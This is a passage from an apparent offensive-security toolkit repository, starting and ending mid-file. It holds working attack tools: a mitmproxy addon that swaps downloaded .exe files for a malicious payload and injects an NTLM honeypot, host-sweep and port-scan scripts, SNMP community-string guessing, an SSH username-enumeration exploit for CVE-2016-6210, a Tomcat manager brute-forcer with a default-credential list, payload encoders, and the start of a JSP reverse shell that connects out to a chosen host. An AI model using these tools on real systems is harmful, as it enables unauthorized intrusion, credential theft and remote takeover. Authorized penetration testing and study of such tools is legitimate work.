' 29 | ) 30 | 31 | 32 | class NTLM(ToolkitBase): 33 | 34 | def load(self, loader): 35 | loader.add_option( 36 | name='toolkit_ntlm_honeypot', 37 | typespec=bool, 38 | default=False, 39 | help='Toolkit: NTLM Honeypot' 40 | ) 41 | 42 | def response(self, flow): 43 | if mitm.ctx.options.toolkit_ntlm_honeypot: 44 | content_type = flow.response.headers.get('Content-Type', '') 45 | if 'text/html' in content_type: 46 | flow.response.set_content( 47 | flow.response.content.replace( 48 | b'', 49 | bytes( 50 | '', 51 | encoding='utf8' 52 | ) 53 | ) 54 | ) 55 | 56 | 57 | class Exec(ToolkitBase): 58 | 59 | def load(self, loader): 60 | loader.add_option( 61 | name='toolkit_bad_exec', 62 | typespec=bool, 63 | default=False, 64 | help='Toolkit: Bad executable' 65 | ) 66 | 67 | def request(self, flow): 68 | if mitm.ctx.options.toolkit_bad_exec: 69 | if flow.request.pretty_url.endswith('.exe'): 70 | with open('/tmp/malicious.exe', 'rb') as f: 71 | payload = f.read() 72 | mitm.flow.response = mitm.http.HTTPResponse.make( 73 | 200, 74 | payload, 75 | {'Content-Type': 'application/octet-stream'}, 76 | ) 77 | 78 | 79 | addons = [ 80 | HTML(), 81 | NTLM(), 82 | Exec(), 83 | ] 84 | -------------------------------------------------------------------------------- /bin/parse_gnmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage:" 5 | echo -e "$0 results.gnmap output_filename" 6 | exit 1 7 | fi 8 | 9 | if [[ ! -f "$1" ]]; then 10 | echo "File not found: $1" 11 | exit 1 12 | fi 13 | 14 | INPUT_FILENAME=$1 15 | OUTPUT_FILENAME=$2 16 | 17 | hosts_list() { 18 | IFS=$'\n' read -r -d '' -a tmp_array < <( grep -E "($1)\/open\/$2" $INPUT_FILENAME | cut -d' ' -f2 | sort | uniq && printf '\0' ) 19 | if (( ${#tmp_array[@]} )); then 20 | printf '%s\n' "${tmp_array[@]}" > $OUTPUT_FILENAME-$3-$2 21 | fi 22 | } 23 | 24 | hosts_list '21' tcp ftp 25 | hosts_list '22' tcp ssh 26 | hosts_list '23' tcp telnet 27 | hosts_list '25' tcp smtp 28 | hosts_list '53' tcp dns 29 | hosts_list '53' udp dns 30 | hosts_list '69' udp tftp 31 | hosts_list '80|81|82|443|8000|8008|8080|8081|8082|8443|8888|9000|9080|9443|9888|9990' tcp http 32 | hosts_list '111' tcp rpc 33 | hosts_list '111' udp rpc 34 | hosts_list '113' tcp ident 35 | hosts_list '135' tcp msrpc 36 | hosts_list '139|445' tcp smb 37 | hosts_list '161' tcp snmp 38 | hosts_list '161' udp snmp 39 | hosts_list '1433' tcp mssql 40 | hosts_list '3306' tcp mysql 41 | hosts_list '3389' tcp rdp 42 | hosts_list '5432' tcp pgsql 43 | hosts_list '6000|6001|6002|6003|6004|6005' tcp x11 44 | -------------------------------------------------------------------------------- /bin/ping.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import asyncio 4 | import concurrent.futures 5 | import random 6 | 7 | import click 8 | import netaddr 9 | from scapy import all as scp 10 | 11 | 12 | def scan(ip, timeout, ttl): 13 | packet = scp.IP(dst=str(ip), ttl=ttl) / scp.ICMP() 14 | result = scp.sr1(packet, timeout=timeout, verbose=0) 15 | if not (result is None): 16 | click.echo(click.style('Host {} seems up!'.format(packet[scp.IP].dst), fg='green', bold=True)) 17 | else: 18 | click.echo(click.style('Host {} timed out.'.format(packet[scp.IP].dst), fg='red')) 19 | 20 | 21 | @click.command() 22 | @click.option('--ip-range', '-i', type=str, required=True, help='IP address range (CIDR)') 23 | @click.option('--timeout', '-t', type=int, default=1, help='Timeout') 24 | @click.option('--randomize', '-r', is_flag=True, default=False, help='Random order') 25 | @click.option('--ttl', '-l', type=int, default=64, help='TTL') 26 | @click.option('--workers', '-w', type=int, default=4, help='Number of workers (16 suggested as maximum)') 27 | def run(ip_range, timeout, randomize, ttl, workers): 28 | ip_list = list(netaddr.IPNetwork(ip_range).iter_hosts()) 29 | if randomize: 30 | random.shuffle(ip_list) 31 | executor = concurrent.futures.ThreadPoolExecutor(max_workers=workers) 32 | loop = asyncio.get_event_loop() 33 | loop.run_until_complete(asyncio.gather( 34 | *[loop.run_in_executor(executor, scan, ip, timeout, ttl) for ip in ip_list] 35 | )) 36 | 37 | 38 | if __name__ == '__main__': 39 | run() 40 | -------------------------------------------------------------------------------- /bin/ping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | trap "exit" INT 4 | 5 | if [[ -z $1 ]]; then 6 | echo "Usage: $0 192.168.1.0/24" 7 | exit 1 8 | fi 9 | 10 | RED='\033[0;31m' 11 | GREEN='\033[1;32m' 12 | NONE='\033[0m' 13 | 14 | for ip in $(prips $1); do 15 | echo -n "Host $ip seems... " 16 | if ping -W 1 -c 1 $ip &>/dev/null; then 17 | echo -e "${GREEN}up${NONE}" 18 | else 19 | echo -e "${RED}down${NONE}" 20 | fi 21 | done 22 | -------------------------------------------------------------------------------- /bin/quote.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import urllib 5 | 6 | 7 | if __name__ == '__main__': 8 | 9 | parser = argparse.ArgumentParser(description='URI encoding') 10 | parser.add_argument('value', help='E.g. \'ls && touch /tmp/temp\'') 11 | args = parser.parse_args() 12 | 13 | print(urllib.quote(args.value)) 14 | -------------------------------------------------------------------------------- /bin/scan_top.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage:" 5 | echo -e "- with host discovery, target as CIDR (network as output prefix):\n\t$0 10.0.0.0/24 300" 6 | echo -e "- skip host discovery, targets in a text file (filename as output prefix):\n\t$0 10.0.0.0-hosts 300" 7 | echo -e 8 | echo -e "NOTE: If executed as root the script will perform UDP and TCP SYN discovery (recommended anyway)." 9 | exit 1 10 | fi 11 | 12 | if [[ -f "$1" ]]; then 13 | echo "[*] Targets provided, skipping discovery..." 14 | FILENAME=$1 15 | TARGET_HOSTS=$1 16 | else 17 | TARGET_CIDR=$1 18 | FILENAME=${TARGET_CIDR::${#TARGET_CIDR}-3} 19 | TARGET_HOSTS=$FILENAME-hosts 20 | TCP_PORTS=21,22,23,139,445,80,443,8000,8080,8443,8888,8008,3389,1433,3306,5432,161,162,5900,6000,49152,49153,49154,49155,49156,49157,110,111,113,1311,137,138,143,1723,20,2301,2179,25,27017,389,4443,5061,514,515,587,5901,5984,5985,5986,636,6379,8082,81,82,88,993,995 21 | UDP_PORTS=111,69,161,53,123 22 | HOSTS_NUM=`prips $1 | wc -l` 23 | echo "[*] Basic ping sweep started..." 24 | nmap -sn -n --randomize-hosts -oA $FILENAME-ping-basic $TARGET_CIDR 25 | if cat $FILENAME-ping-basic.gnmap | grep "Nmap done" | grep -q "$HOSTS_NUM hosts up"; then 26 | echo "[*] All $HOSTS_NUM hosts up (in theory), ignoring basic ping results..." 27 | rm $FILENAME-ping-basic.gnmap 28 | fi 29 | echo "[*] Extra TCP ACK sweep with selected ports started..." 30 | nmap -sn -n --randomize-hosts -PA$TCP_PORTS -oA $FILENAME-ping-extra $TARGET_CIDR 31 | if cat $FILENAME-ping-extra.gnmap | grep "Nmap done" | grep -q "$HOSTS_NUM hosts up"; then 32 | echo "[*] All $HOSTS_NUM hosts up (in theory), ignoring extra TCP ACK ping results..." 33 | rm $FILENAME-ping-extra.gnmap 34 | fi 35 | if [ "$(id -u)" == "0" ]; then 36 | echo "[*] Extra TCP SYN sweep with selected ports started..." 37 | nmap -sn -n --randomize-hosts -PS$TCP_PORTS -oA $FILENAME-ping-extra $TARGET_CIDR 38 | echo "[*] Extra sweep with selected UDP ports started..." 39 | nmap -sn -n --randomize-hosts -PU$UDP_PORTS -oA $FILENAME-ping-udp $TARGET_CIDR 40 | fi 41 | grep "Status: Up" $FILENAME-ping*.gnmap | cut -d" " -f2 | sort | uniq > $TARGET_HOSTS 42 | fi 43 | 44 | TOP_PORTS=$2 45 | 46 | 47 | echo "[*] Scanning top $TOP_PORTS ports..." 48 | nmap -Pn -n --randomize-hosts -v --open --top-ports $TOP_PORTS -iL $TARGET_HOSTS -oA $FILENAME-ports-top-$TOP_PORTS 49 | 50 | echo "[*] Parsing results..." 51 | parse_gnmap.sh $FILENAME-ports-top-$TOP_PORTS.gnmap $FILENAME-ports-top-$TOP_PORTS 52 | -------------------------------------------------------------------------------- /bin/snmp_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 192.168.1.0/24" 5 | exit 1 6 | fi 7 | 8 | for ip in $(prips $1); do 9 | echo $ip; 10 | for str in $(cat /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt); do 11 | if snmpwalk -OsS -v 1 -c $str $ip &>/dev/null; then 12 | echo $str 13 | break 14 | fi 15 | done 16 | done 17 | -------------------------------------------------------------------------------- /bin/snmp_public_hosts.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [[ -z $1 ]]; then 4 | echo "Usage: $0 hosts.txt" 5 | exit 1 6 | fi 7 | 8 | for host in $(cat "$1"); do 9 | snmp-check -c public $host 10 | done 11 | -------------------------------------------------------------------------------- /bin/ssh_enum_time.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari) 4 | # 5 | # Author: 0_o -- null_null 6 | # nu11.nu11 [at] yahoo.com 7 | # Oh, and it is n-u-one-one.n-u-one-one, no l's... 8 | # Wonder how the guys at packet storm could get this wrong :( 9 | # 10 | # Date: 2016-07-19 11 | # 12 | # Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. 13 | # 14 | # Prerequisites: Network access to the SSH daemon. 15 | # 16 | # DISCLAIMER: Use against your own hosts only! Attacking stuff you are not 17 | # permitted to may put you in big trouble! 18 | # 19 | # And now - the fun part :-) 20 | # 21 | 22 | 23 | import paramiko 24 | import time 25 | import numpy 26 | import argparse 27 | import sys 28 | 29 | args = None 30 | 31 | 32 | class bcolors: 33 | HEADER = '\033[95m' 34 | OKBLUE = '\033[94m' 35 | OKGREEN = '\033[92m' 36 | WARNING = '\033[93m' 37 | FAIL = '\033[91m' 38 | ENDC = '\033[0m' 39 | BOLD = '\033[1m' 40 | UNDERLINE = '\033[4m' 41 | 42 | 43 | def get_args(): 44 | parser = argparse.ArgumentParser() 45 | group = parser.add_mutually_exclusive_group() 46 | parser.add_argument("host", type=str, help="Give SSH server address like ip:port or just by ip") 47 | group.add_argument("-u", "--user", type=str, help="Give a single user name") 48 | group.add_argument("-U", "--userlist", type=str, help="Give a file containing a list of users") 49 | parser.add_argument("-e", "--enumerated", action="store_true", help="Only show enumerated users") 50 | parser.add_argument("-s", "--silent", action="store_true", help="Like -e, but just the user names will be written to stdout (no banner, no anything)") 51 | parser.add_argument("--bytes", default=50000, type=int, help="Send so many BYTES to the SSH daemon as a password") 52 | parser.add_argument("--samples", default=12, type=int, help="Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users") 53 | parser.add_argument("--factor", default=3.0, type=float, help="Used to compute the upper timing boundary for user enumeration") 54 | parser.add_argument("--trials", default=1, type=int, help="try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary") 55 | args = parser.parse_args() 56 | return args 57 | 58 | 59 | def get_banner(host, port): 60 | ssh = paramiko.SSHClient() 61 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 62 | try: 63 | ssh.connect(hostname=host, port=port, username='invalidinvalidinvalid', password='invalidinvalidinvalid') 64 | except Exception: 65 | banner = ssh.get_transport().remote_version 66 | ssh.close() 67 | return banner 68 | 69 | 70 | def connect(host, port, user): 71 | global args 72 | starttime = 0.0 73 | endtime = 0.0 74 | p = 'B' * int(args.bytes) 75 | ssh = paramiko.SSHClient() 76 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 77 | starttime = time.process_time() 78 | try: 79 | ssh.connect(hostname=host, port=port, username=user, password=p, look_for_keys=False, gss_auth=False, gss_kex=False, gss_deleg_creds=False, gss_host=None, allow_agent=False) 80 | except Exception: 81 | endtime = time.process_time() 82 | finally: 83 | ssh.close() 84 | return endtime - starttime 85 | 86 | 87 | def main(): 88 | global args 89 | args = get_args() 90 | if not args.silent: 91 | print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210") 92 | if not args.silent: 93 | print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n") 94 | if args.host: 95 | host = args.host.split(":")[0] 96 | try: 97 | port = int(args.host.split(":")[1]) 98 | except IndexError: 99 | port = 22 100 | users = [] 101 | if args.user: 102 | users.append(args.user) 103 | elif args.userlist: 104 | with open(args.userlist, "r") as f: 105 | users = f.readlines() 106 | else: 107 | if not args.silent: 108 | print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users") 109 | sys.exit() 110 | if not args.silent: 111 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC) 112 | # get baseline timing for non-existing users... 113 | baseline_samples = [] 114 | baseline_mean = 0.0 115 | baseline_deviation = 0.0 116 | if not args.silent: 117 | sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users") 118 | for i in range(1, int(args.samples) + 1): 119 | if not args.silent: 120 | sys.stdout.write('.') 121 | if not args.silent: 122 | sys.stdout.flush() 123 | sample = connect(host, port, 'foobar-bleh-nonsense' + str(i)) 124 | baseline_samples.append(sample) 125 | if not args.silent: 126 | sys.stdout.write('\n') 127 | # remove the biggest and smallest value 128 | baseline_samples.sort() 129 | baseline_samples.pop() 130 | baseline_samples.reverse() 131 | baseline_samples.pop() 132 | # do math 133 | baseline_mean = numpy.mean(numpy.array(baseline_samples)) 134 | baseline_deviation = numpy.std(numpy.array(baseline_samples)) 135 | if not args.silent: 136 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.") 137 | if not args.silent: 138 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.") 139 | upper = baseline_mean + float(args.factor) * baseline_deviation 140 | if not args.silent: 141 | print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.") 142 | if not args.silent: 143 | print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...") 144 | # 145 | # Get timing for the given user name... 146 | # 147 | for u in users: 148 | user = u.strip() 149 | enum_samples = [] 150 | enum_mean = 0.0 151 | for t in range(0, int(args.trials)): 152 | timeval = connect(host, port, user) 153 | enum_samples.append(timeval) 154 | enum_mean = numpy.mean(numpy.array(enum_samples)) 155 | if (enum_mean < upper): 156 | if not (args.enumerated or args.silent): 157 | print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) 158 | else: 159 | if not args.silent: 160 | print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean)) 161 | else: 162 | print(user) 163 | 164 | 165 | if __name__ == '__main__': 166 | main() 167 | -------------------------------------------------------------------------------- /bin/tomcat_brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import requests 5 | 6 | 7 | PASSWD = [ 8 | ('tomcat', ''), 9 | ('admin', ''), 10 | ('admin', 'admin'), 11 | ('admin', 'tomcat'), 12 | ('tomcat', 'tomcat'), 13 | ('manager', 'manager'), 14 | ('tomcat', 'admin'), 15 | ('manager', 'admin'), 16 | ('tomcat', 's3cret'), 17 | ('root', 'root'), 18 | ('ADMIN', 'ADMIN'), 19 | ('tomcat', 'admanager'), 20 | ('tomcat', 'adrole1'), 21 | ('tomcat', 'adroot'), 22 | ('tomcat', 'adtomcat'), 23 | ('tomcat', 'advagrant'), 24 | ('tomcat', 'changethis'), 25 | ('tomcat', 'password'), 26 | ('tomcat', 'password1'), 27 | ('admin', 'admanager'), 28 | ('admin', 'adrole1'), 29 | ('admin', 'adroot'), 30 | ('admin', 'adtomcat'), 31 | ('admin', 'advagrant'), 32 | ('admin', 'password'), 33 | ('admin', 'password1'), 34 | ('admin', 'Password1'), 35 | ('admin', 'vagrant'), 36 | ('manager', 'admanager'), 37 | ('manager', 'adrole1'), 38 | ('manager', 'adroot'), 39 | ('manager', 'adtomcat'), 40 | ('manager', 'advagrant'), 41 | ('both', 'admanager'), 42 | ('both', 'admin'), 43 | ('both', 'adrole1'), 44 | ('both', 'adroot'), 45 | ('both', 'adtomcat'), 46 | ('both', 'advagrant'), 47 | ('both', 'tomcat'), 48 | ('demo', 'demo'), 49 | ('role', 'changethis'), 50 | ('role1', 'admanager'), 51 | ('role1', 'admin'), 52 | ('role1', 'adrole1'), 53 | ('role1', 'adroot'), 54 | ('role1', 'adtomcat'), 55 | ('role1', 'advagrant'), 56 | ('role1', 'role1'), 57 | ('role1', 'tomcat'), 58 | ('root', 'admanager'), 59 | ('root', 'admin'), 60 | ('root', 'adrole1'), 61 | ('root', 'adroot'), 62 | ('root', 'adtomcat'), 63 | ('root', 'advagrant'), 64 | ('root', 'changethis'), 65 | ('root', 'password'), 66 | ('root', 'password1'), 67 | ('root', 'Password1'), 68 | ('root', 'r00t'), 69 | ('root', 'toor'), 70 | ('tomcat', 'ads3cret'), 71 | ('admin', 'ads3cret'), 72 | ('manager', 'ads3cret'), 73 | ('both', 'ads3cret'), 74 | ('role1', 'ads3cret'), 75 | ('root', 'ads3cret'), 76 | ('ovwebusr', 'OvW*busr1'), 77 | ('server_admin', 'owaspbwa'), 78 | ('admin', 'owaspbwa'), 79 | ('root', 'owaspbwa'), 80 | ('xampp', 'xampp'), 81 | ('cxsdk', 'kdsxc'), 82 | ('j2deployer', 'j2deployer'), 83 | ('QCC', 'QLogic66'), 84 | ] 85 | 86 | 87 | if __name__ == '__main__': 88 | 89 | parser = argparse.ArgumentParser( 90 | description='Apache Tomcat bruteforce utility', 91 | formatter_class=argparse.ArgumentDefaultsHelpFormatter 92 | ) 93 | parser.add_argument('-u', '--url', help='E.g. "http://localhost:8080/manager/html"', required=True) 94 | args = parser.parse_args() 95 | print(f'Checking {args.url}...') 96 | for cred in PASSWD: 97 | req = requests.get(args.url, auth=cred) 98 | if req.status_code == 200: 99 | print(f'Worked: {cred[0]}:{cred[1]}') 100 | break 101 | else: 102 | print(f'Failed: {cred[0]}:{cred[1]}') 103 | -------------------------------------------------------------------------------- /bin/vba_format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import click 4 | 5 | 6 | def vb_wrap(val): 7 | return f'& "{val}" _' 8 | 9 | 10 | @click.command() 11 | @click.option('--body', '-b', type=str, required=True, help='Input string') 12 | @click.option('--line-length', '-l', type=int, default=30, required=True, help='Maximum line length') 13 | def run(body, line_length): 14 | i = 0 15 | if len(body) > line_length: 16 | print('"' + body[0:line_length] + '" _') 17 | for x in range(1, len(body) // line_length): 18 | i = x * line_length 19 | print(vb_wrap(body[i:i + line_length])) 20 | print('& "' + body[i + line_length:] + '"') 21 | else: 22 | print(body) 23 | 24 | 25 | if __name__ == '__main__': 26 | run() 27 | -------------------------------------------------------------------------------- /bin/vbe_decoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __description__ = 'Decode an encoded VBScript, often seen as a .vbe file' 4 | __author__ = 'John Hammond' 5 | __date__ = '02/10/2021' 6 | 7 | """ 8 | Credit for this baseline code goes to Didier Stevens, from his original repo. 9 | https://github.com/DidierStevens/DidierStevensSuite/blob/master/decode-vbe.py 10 | 11 | All I have done is merely cleaned the code a bit, made it Python3 friendly, 12 | and handled support for multiple #@~...#~@ markings. 13 | """ 14 | 15 | import argparse 16 | import sys 17 | import os 18 | from colorama import Fore, Style 19 | import re 20 | 21 | 22 | parser = argparse.ArgumentParser(description=__description__) 23 | parser.add_argument('files', metavar='file', type=str, nargs='+', help='file to decode') 24 | parser.add_argument('-o', '--output', metavar='output', type=str, default=None, help='output file (default stdout)') 25 | args = parser.parse_args() 26 | 27 | 28 | def decode_data(data: str): 29 | 30 | # Magic number used for the VBE voodoo magic below 31 | decoding_offset = 9 32 | 33 | # Decoding mapping for unique bytes in the encoded scheme 34 | decodings = ['\x57\x6E\x7B', '\x4A\x4C\x41', '\x0B\x0B\x0B', '\x0C\x0C\x0C', '\x4A\x4C\x41', '\x0E\x0E\x0E', '\x0F\x0F\x0F', '\x10\x10\x10', '\x11\x11\x11', '\x12\x12\x12', '\x13\x13\x13', '\x14\x14\x14', '\x15\x15\x15', '\x16\x16\x16', '\x17\x17\x17', '\x18\x18\x18', '\x19\x19\x19', '\x1A\x1A\x1A', '\x1B\x1B\x1B', '\x1C\x1C\x1C', '\x1D\x1D\x1D', '\x1E\x1E\x1E', '\x1F\x1F\x1F', '\x2E\x2D\x32', '\x47\x75\x30', '\x7A\x52\x21', '\x56\x60\x29', '\x42\x71\x5B', '\x6A\x5E\x38', '\x2F\x49\x33', '\x26\x5C\x3D', '\x49\x62\x58', '\x41\x7D\x3A', '\x34\x29\x35', '\x32\x36\x65', '\x5B\x20\x39', '\x76\x7C\x5C', '\x72\x7A\x56', '\x43\x7F\x73', '\x38\x6B\x66', '\x39\x63\x4E', '\x70\x33\x45', '\x45\x2B\x6B', '\x68\x68\x62', '\x71\x51\x59', '\x4F\x66\x78', '\x09\x76\x5E', '\x62\x31\x7D', '\x44\x64\x4A', '\x23\x54\x6D', '\x75\x43\x71', '\x4A\x4C\x41', '\x7E\x3A\x60', '\x4A\x4C\x41', '\x5E\x7E\x53', '\x40\x4C\x40', '\x77\x45\x42', '\x4A\x2C\x27', '\x61\x2A\x48', '\x5D\x74\x72', '\x22\x27\x75', '\x4B\x37\x31', '\x6F\x44\x37', '\x4E\x79\x4D', '\x3B\x59\x52', '\x4C\x2F\x22', '\x50\x6F\x54', '\x67\x26\x6A', '\x2A\x72\x47', '\x7D\x6A\x64', '\x74\x39\x2D', '\x54\x7B\x20', '\x2B\x3F\x7F', '\x2D\x38\x2E', '\x2C\x77\x4C', '\x30\x67\x5D', '\x6E\x53\x7E', '\x6B\x47\x6C', '\x66\x34\x6F', '\x35\x78\x79', '\x25\x5D\x74', '\x21\x30\x43', '\x64\x23\x26', '\x4D\x5A\x76', '\x52\x5B\x25', '\x63\x6C\x24', '\x3F\x48\x2B', '\x7B\x55\x28', '\x78\x70\x23', '\x29\x69\x41', '\x28\x2E\x34', '\x73\x4C\x09', '\x59\x21\x2A', '\x33\x24\x44', '\x7F\x4E\x3F', '\x6D\x50\x77', '\x55\x09\x3B', '\x53\x56\x55', '\x7C\x73\x69', '\x3A\x35\x61', '\x5F\x61\x63', '\x65\x4B\x50', '\x46\x58\x67', '\x58\x3B\x51', '\x31\x57\x49', '\x69\x22\x4F', '\x6C\x6D\x46', '\x5A\x4D\x68', '\x48\x25\x7C', '\x27\x28\x36', '\x5C\x46\x70', '\x3D\x4A\x6E', '\x24\x32\x7A', '\x79\x41\x2F', '\x37\x3D\x5F', '\x60\x5F\x4B', '\x51\x4F\x5A', '\x20\x42\x2C', '\x36\x65\x57'] 35 | 36 | # The combination switching for the encoded bytes 37 | combinations = [0, 1, 2, 0, 1, 2, 1, 2, 2, 1, 2, 1, 0, 2, 1, 2, 0, 2, 1, 2, 0, 0, 1, 2, 2, 1, 0, 2, 1, 2, 2, 1, 0, 0, 2, 1, 2, 1, 2, 0, 2, 0, 0, 1, 2, 0, 2, 1, 0, 2, 1, 2, 0, 0, 1, 2, 2, 0, 0, 1, 2, 0, 2, 1] 38 | 39 | # Replace the data with some strings we already know the meaning of 40 | replacements = [('@&', chr(10)), ('@#', chr(13)), ('@*', '>'), ('@!', '<'), ('@$', '@')] 41 | for replacement in replacements: 42 | to_replace, replace_with = replacement 43 | data = data.replace(to_replace, replace_with) 44 | 45 | # Now that it is prepared, replace all the other encoded data 46 | result = [] 47 | index = -1 48 | bad_bytes = [60, 62, 64] 49 | for char in data: 50 | byte = ord(char) 51 | if byte < 128: 52 | index = index + 1 53 | if ((byte == decoding_offset) or (byte > 31 and byte < 128) and (byte not in bad_bytes)): 54 | # Do the translation to get the right byte 55 | char = [c for c in decodings[byte - decoding_offset]][combinations[index % 64]] 56 | result.append(char) 57 | return ''.join(result) 58 | 59 | 60 | def fatal_error(message: str): 61 | """ 62 | Convenience function to display an error message and quit. 63 | """ 64 | sys.stderr.write(f'[{Fore.RED}{Style.BRIGHT}!{Style.RESET_ALL}{Fore.RESET}] fatal error, {str(message)}\n') 65 | sys.exit(-1) 66 | 67 | 68 | def success(message: str): 69 | """ 70 | Convenience function to display a success message and quit. 71 | """ 72 | sys.stderr.write(f'[{Fore.GREEN}{Style.BRIGHT}+{Style.RESET_ALL}{Fore.RESET}] success, {str(message)}\n') 73 | 74 | 75 | def validate_files(files: list): 76 | """ 77 | Check if the supplied files actually exist and are in fact files 78 | """ 79 | for file in files: 80 | if not os.path.exists(file): 81 | fatal_error(f'supplied file "{str(file)}" does not exist') 82 | if not os.path.isfile(file): 83 | fatal_error(f'supplied file "{str(file)}" is not a file (maybe directory?)') 84 | 85 | 86 | def decode_files(files: list): 87 | output = [] 88 | for file in files: 89 | output.append(decode_file(file)) 90 | 91 | return '\n'.join(output) 92 | 93 | 94 | def decode_file(file): 95 | try: 96 | handle = open(file, 'r') 97 | contents = handle.read() 98 | except Exception as e: 99 | fatal_error(f'{e.message}') 100 | finally: 101 | handle.close() 102 | 103 | encoded_data = re.findall(r'#@~\^......==(.+)......==\^#~@', contents) 104 | 105 | decoded_data = [] 106 | for data in encoded_data: 107 | decoded_data.append(decode_data(data)) 108 | 109 | return '\n'.join(decoded_data) 110 | 111 | 112 | def main(): 113 | """ 114 | Decode an encoded VBScript, often seen as a .vbe file 115 | """ 116 | 117 | # Ensure we can work with these files, and then decode them 118 | validate_files(args.files) 119 | output = decode_files(args.files) 120 | 121 | # Return the results as requested. 122 | if not args.output: 123 | sys.stdout.write(output) 124 | else: 125 | try: 126 | handle = open(args.output, 'w') 127 | handle.write(output) 128 | success(f'wrote decoded vbscript to "{str(args.output)}"') 129 | except Exception as e: 130 | fatal_error(f'{e.message}') 131 | 132 | 133 | if __name__ == '__main__': 134 | main() 135 | -------------------------------------------------------------------------------- /bin/xor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import click 4 | import sys 5 | 6 | 7 | class Convert: 8 | 9 | pass 10 | 11 | 12 | class XOR(Convert): 13 | 14 | def __init__(self, data, is_list): 15 | self.data = self.parse(data, is_list) 16 | 17 | def to_dec(self, val): 18 | return int(val) 19 | 20 | def to_hex(self, val): 21 | return int(val, 16) 22 | 23 | def parse(self, val, is_list): 24 | if is_list: 25 | val = val.split(b',') 26 | func = self.to_hex if b'x' in val[0] else self.to_dec 27 | val = [func(c) for c in val] 28 | else: 29 | val = list(val) 30 | return val 31 | 32 | def convert(self, key): 33 | key = self.parse(key, True) 34 | klen = len(key) 35 | xored = [self.data[i] ^ key[i % klen] for i in range(0, len(self.data))] 36 | return xored 37 | 38 | 39 | @click.command() 40 | @click.option('--data', '-d', type=str, required=False, help='Data argument, reads from stdin if not provided') 41 | @click.option('--key', '-k', type=str, required=True, help='Key as comma separated list of hex or decimal values') 42 | @click.option('--is-list', '-l', default=False, is_flag=True, help='Treat data as comma separated list of hex or decimal values') 43 | @click.option('--truncate', '-t', default=1000, help='Truncate screen output by number of characters') 44 | @click.option('--output', '-o', type=str, required=False, help='Save output to file') 45 | def run(data, key, is_list, truncate, output): 46 | if data is None: 47 | data = sys.stdin.buffer.read() 48 | else: 49 | data = data.encode(sys.stdin.encoding) 50 | xor = XOR(data, is_list) 51 | xored = xor.convert(key.encode(sys.stdin.encoding)) 52 | int_output = ','.join([str(c) for c in xored[:truncate]]) 53 | hex_output = ','.join([hex(c) for c in xored[:truncate]]) 54 | click.echo(click.style('Int: ' + int_output + ' [...]', fg='green', bold=True)) 55 | click.echo(click.style('Hex: ' + hex_output + ' [...]', fg='yellow', bold=True)) 56 | click.echo('Length: ' + str(len(xor.data))) 57 | if output is not None: 58 | with open(output, 'wb') as fil: 59 | fil.write(bytes(xored)) 60 | click.echo('Output saved to: ' + output) 61 | 62 | 63 | if __name__ == '__main__': 64 | run() 65 | -------------------------------------------------------------------------------- /snippets/html/smuggling.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /snippets/java/shells/reverse/reverse.jsp: -------------------------------------------------------------------------------- 1 | <%-- Ex. http://192.168.1.1:8080/test.jsp?ip=192.168.1.100&port=8080&shell=/bin/bash --%> 2 | <%@ 3 | page import="java.lang.*, java.util.*, java.io.*, java.net.*" 4 | %> 5 | <%! 6 | static class StreamConnector extends Thread { 7 | 8 | InputStream is; 9 | OutputStream os; 10 | 11 | StreamConnector(InputStream is, OutputStream os) { 12 | this.is = is; 13 | this.os = os; 14 | } 15 | 16 | public void run() { 17 | 18 | BufferedReader in = null; 19 | BufferedWriter out = null; 20 | 21 | try { 22 | in = new BufferedReader(new InputStreamReader(is)); 23 | out = new BufferedWriter(new OutputStreamWriter(os)); 24 | char buffer[] = new char[8192]; 25 | int lenRead; 26 | while( (lenRead = in.read(buffer, 0, buffer.length)) > 0) { 27 | out.write(buffer, 0, lenRead); 28 | out.flush(); 29 | } 30 | } catch (Exception exc) {} 31 | 32 | try 